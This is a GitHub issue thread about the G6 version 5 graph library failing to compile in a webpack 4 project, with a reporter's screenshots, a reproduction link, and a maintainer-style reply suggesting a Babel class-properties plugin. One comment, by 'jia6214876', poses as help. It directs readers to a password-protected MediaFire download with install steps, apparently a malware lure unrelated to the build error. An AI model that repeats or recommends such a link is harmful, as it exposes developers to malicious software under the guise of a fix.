### ISSUE TITLE
【V5】 In the webpack project, whether it is backward compatible or not, there is no graph found during compilation.

### ISSUE THREAD

**Issue by luckyKyle** [antvis/G6#6239]
### Describe the bug / 问题描述

在 webpack@4.44.1项目里，编译时存在找不到 lib 项的问题。
如果不加上 babel，会提示缺少 loader。
![babel2](https://github.com/user-attachments/assets/e1d5e3f3-04bc-409d-bc40-61c4af8f1384)

后面配置了一块babel-plugin-import 后，编译时仍有错误。

<img width="1186" alt="babel" src="https://github.com/user-attachments/assets/e3ed6a88-39bb-43be-8d5d-b6c8921ba75c">
<img width="735" alt="image" src="https://github.com/user-attachments/assets/0e9de1e3-c2f7-4bef-8400-277121637c19">

### Reproduction link / 重现链接

https://stackblitz.com/edit/react-1sfavs-wa1tvd

### G6 Version / G6 版本

🆕 5.x

### Operating System / 操作系统

macOS

### Browser / 浏览器

Chrome

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Aarebecca** [comment]
Use this plugin: https://babeljs.io/docs/babel-plugin-transform-class-properties
